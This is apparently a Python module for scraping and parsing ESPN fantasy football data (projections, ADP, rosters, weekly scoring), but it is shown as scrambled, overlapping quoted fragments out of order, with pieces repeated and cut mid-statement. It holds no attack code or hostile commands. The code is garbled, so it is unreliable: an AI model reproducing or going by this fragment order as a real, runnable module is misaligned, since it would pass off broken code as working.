@staticmethod", "\"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos =", "page Args: season_year (int): 2017, 2016, etc. 
week (int): 1 through 17 position", "@staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args: content(str): HTML", "HTML string TODO: revise based on new URL \"\"\" pos = pos.lower() slot_categories", "if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid", "split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content, pos):", "def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name", "content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k:", "scoring page Args: season_year (int): 2017, 2016, etc. week (int): 1 through 17", "page for kickers Args: content (str): HTML Returns: list: of dict \"\"\" #", "class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\":", "te, k, etc. 
Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def", "# espn.py # classes for scraping, parsing espn football data # this does", "\"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if", "\"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\",", "Args: val: Returns: number \"\"\" if \"--\" in val: return 0 return val", "self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content, pos): \"\"\" Parses page", "= re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ #", "Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if", "weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str): HTML Returns: list: of", "data # espn_fantasy is mostly about managing fantasy teams # NOTE: trouble accessing", "def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to", "= scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p", "\"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod", "Args: content (str): HTML Returns: list: of dict \"\"\" results = [] headers", "int 1, 2, 3 offset: int 0, 40, 80, etc. 
Returns: HTML string", "row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes):", "players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn'", "offseason # will have to revisit this module as season approaches \"\"\" import", "Args: season_year (int): 2017, 2016, etc. week (int): 1 through 17 position (str):", "roster page into list of player dict Args: content: HTML of espn nfl", "7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13:", "if \"--\" in val: return 0 return val @staticmethod def adp(content): \"\"\" Parses", "TODO: adapt for dst results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\",", "pos: Returns: list: of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\")", "\"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for k, v in item[\"player\"].items()", "\"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\")", "return 0 return val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content:", "soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in", "> 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year:", "encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL players from ESPN.com Args:", "HTML Returns: list: of dict \"\"\" # TODO: adapt for dst results =", "for k, v in item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\",", "scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): 
default None parser(espn.Parser): default", "\"\"\" Parses season-long ADP Args: content: Returns: list of dict \"\"\" vals =", "params=params) class Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\"", "\"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\",", "etc. week (int): 1 through 17 position (str): 'qb', 'wr', etc. Returns: str:", "list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row", "row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr =", "link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match:", "return players @staticmethod def team_roster(content): \"\"\" Parses team roster page into list of", "len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2]", "import re from bs4 import BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from", "parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper", "else: self._p = Parser() def adp(self, season_year): \"\"\" Gets season ADP data Args:", "2018, 2019, etc. Returns: list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content)", "\"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\",", "6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12:", "does include some basic fantasy data # espn_fantasy is mostly about managing fantasy", "str qb, rb, wr, te, k, etc. 
season_year: int 2017, 2016 week: int", "f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all", "Gets page with all players by position Args: pos(str): qb, rb, wr, te,", "v for k, v in item[\"player\"].items() if k in tl_wanted} for scoring_type in", "tds[2].text # add to list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses", "row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") #", "\"\"\" Gets list of NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF',", "<a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if", "# TODO: adapt for dst results = [] headers = [ \"c_a\", \"pass_yds\",", "soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds =", "# they have attempts/completions in one column so have to remove & split", "page with all players by position Args: pos(str): qb, rb, wr, te, k,", "in item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type", "def players_position(content, pos): \"\"\" Parses page of ESPN players by position Args: content:", "link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match:", "rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] =", "class Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"):", "module as season approaches \"\"\" import logging import re 
from bs4 import BeautifulSoup,", "data Args: season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\" content =", "child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly", "]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise", "etc. Returns: str: HTML TODO: rework for new URL \"\"\" poscode = {\"qb\":", "if parser: self._p = parser else: self._p = Parser() def adp(self, season_year): \"\"\"", "pos is valid and uppercase Args: pos(str): Returns: str \"\"\" if pos in", "either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if __name__ == \"__main__\":", "for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\"", "tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")})", "href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link:", "params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"]", "etc. 
Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return", "soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers", "\"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type", "pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position:", "url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\":", "position (str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework for new URL", "240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos not in", "160, \"dst\": 0, \"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos", "} else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week", "value to numeric 0 Args: val: Returns: number \"\"\" if \"--\" in val:", "through stats # they have attempts/completions in one column so have to remove", "scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self, content,", "set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\":", "match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\",", "tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player) return players @staticmethod", "child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common 
scraping/parsing tasks \"\"\" def", "match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/", "espn_fantasy is mostly about managing fantasy teams # NOTE: trouble accessing data in", "by position Args: content: pos: Returns: list: of dict \"\"\" players = []", "re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) #", "team_roster(content): \"\"\" Parses team roster page into list of player dict Args: content:", "def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str): HTML Returns: list:", "player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring", "player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/", "ESPN players by position Args: content: pos: Returns: list: of dict \"\"\" players", "results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self,", "if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] =", "in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid position: {}\".format(pos))", "\"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in", "team_roster(self, team_code): \"\"\" Gets list of NFL players from ESPN.com Args: team_code: str", "string Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\")", "\"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): 
player =", "pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset %", "= \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return", "attempts/completions in one column so have to remove & split vals = [self._val(td.text)", "child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results", "= set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\",", "content: pos: Returns: list: of dict \"\"\" players = [] soup = BeautifulSoup(content,", "for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if", "\"proTeamId\", ] api_player = {k: v for k, v in item[\"player\"].items() if k", "for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\",", "link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td>", "scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser", "if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\")", "results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers", "'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def", "through 17 position (str): 'qb', 'wr', etc. 
Returns: str: HTML TODO: rework for", "pass return players @staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN players", "17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0,", "\"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16,", "BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player", "22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28:", "# add to list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team", "td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name, team,", "team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child,", "Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes", "season ADP data Args: season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\"", "weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring page Args: season_year (int):", "tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if", "\"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\":", "dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"):", "{\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1)", "Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\"", "position Args: pos(str): qb, rb, wr, te, k, etc. 
Returns: str \"\"\" url", "val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content: Returns: list of", "players_position(self, pos): \"\"\" Gets page with all players by position Args: pos(str): qb,", "include some basic fantasy data # espn_fantasy is mostly about managing fantasy teams", "results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None,", "120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos", ") return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all players by", "row.find_all(\"td\", class_=\"playertableStat\")] if tds: player = dict(zip(headers, tds)) # name, team, position nametd", "[\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" +", "continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError:", "for dst results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\",", "1 through 17 position (str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework", "pos): \"\"\" Parses ESPN fantasy football season-long sortable projections page Args: content: HTML", "\"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player", "2016, etc. week (int): 1 through 17 position (str): 'qb', 'wr', etc. Returns:", "5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11:", "\"\"\" Parses ESPN fantasy football season-long sortable projections page Args: content: HTML string", "\"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ] for", "\"\"\" Gets adp data Args: season_year(int): 2019, etc. 
Returns: dict: parsed JSON \"\"\"", "team roster page Returns: list of dict \"\"\" players = [] soup =", "column so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass", "season_year, week, position): \"\"\" Gets weekly fantasy scoring page Args: season_year (int): 2017,", "season-long sortable projections page Args: content: HTML string Returns: list of dict \"\"\"", "\"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def", "for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif", "0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower()", "\"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", []))", "re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) #", "espn.py # classes for scraping, parsing espn football data # this does include", "4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240,", "27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", }", "for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid", "\"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\",", "uppercase Args: pos(str): Returns: str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\",", "link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content):", "content(str): HTML Returns: list: of dict \"\"\" # TODO: adapt for dst results", "= [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\",", "\"\"\" results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", 
\"rush_att\", \"rush_yds\",", "# tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\"", "Args: pos(str): qb, rb, wr, te, k, etc. Returns: str \"\"\" url =", "'wr', etc. Returns: str: HTML TODO: rework for new URL \"\"\" poscode =", "from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\",", "= BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try:", "\"\"\" Parses weekly scoring page for dst Args: content(str): HTML Returns: list: of", "if link: match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]:", "NFL players from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. Returns: HTML string", "for kickers Args: content (str): HTML Returns: list: of dict \"\"\" # TODO:", "Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p = Parser() def adp(self, season_year):", "season-long ADP Args: content: Returns: list of dict \"\"\" vals = [] for", "# espn_fantasy is mostly about managing fantasy teams # NOTE: trouble accessing data", "to revisit this module as season approaches \"\"\" import logging import re from", "of dict \"\"\" results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\",", "tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v", "if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 >", "= \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets", "\"\"\" Parses page of ESPN players by position Args: content: pos: Returns: list:", "\"Car\", 30: \"Jax\", 33: \"Bal\", 
34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com", "params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self,", "approaches \"\"\" import logging import re from bs4 import BeautifulSoup, NavigableString, Tag from", "tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link,", "2017, 2016 week: int 1, 2, 3 offset: int 0, 40, 80, etc.", "item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player", "\"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default", "pos: str qb, rb, wr, te, k, etc. season_year: int 2017, 2016 week:", "scraping, parsing espn football data # this does include some basic fantasy data", "from ESPN.com Args: team_code: str 'DEN', 'BUF', etc. 
Returns: HTML string \"\"\" url", "scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper:", "players by position Args: content: pos: Returns: list: of dict \"\"\" players =", "add to list players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team roster", "url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets", "list of dict \"\"\" vals = [] for item in content[\"players\"]: tl_wanted =", "\"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds =", "\"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content,", "child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for", "\"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup =", "self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all players by position Args:", "{\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"]", "tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for", "in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val", "tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower() == \"k\": for row", "remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod 
def", "25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33:", "for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\" + rank_type try:", "ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = {", "Args: content: HTML of espn nfl team roster page Returns: list of dict", "elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\":", "zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player) elif pos.lower() == \"k\": for", "int 0, 40, 80, etc. Returns: HTML string TODO: revise based on new", "sure pos is valid and uppercase Args: pos(str): Returns: str \"\"\" if pos", "Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None,", "= pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\":", "Args: content: Returns: list of dict \"\"\" vals = [] for item in", "content, pos): \"\"\" Parses ESPN fantasy football season-long sortable projections page Args: content:", "try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue", "class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\"", "name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if", "parser else: self._p = Parser() def adp(self, season_year): \"\"\" Gets season ADP data", "\"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\",", "set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\")", "= 
row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link =", "source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if __name__ ==", "Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent", "player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content): \"\"\"", "player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing tasks", "pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content", "\"\"\" Gets page with projections by position Args: pos: str qb, rb, wr,", "object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler())", "in val: return 0 return val @staticmethod def adp(content): \"\"\" Parses season-long ADP", "10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16:", "link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly", "\"TB\", 28: \"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class", "week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def", "str: HTML TODO: rework for new URL \"\"\" poscode = {\"qb\": 0, \"rb\":", "= row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr", "scraper else: self._s = 
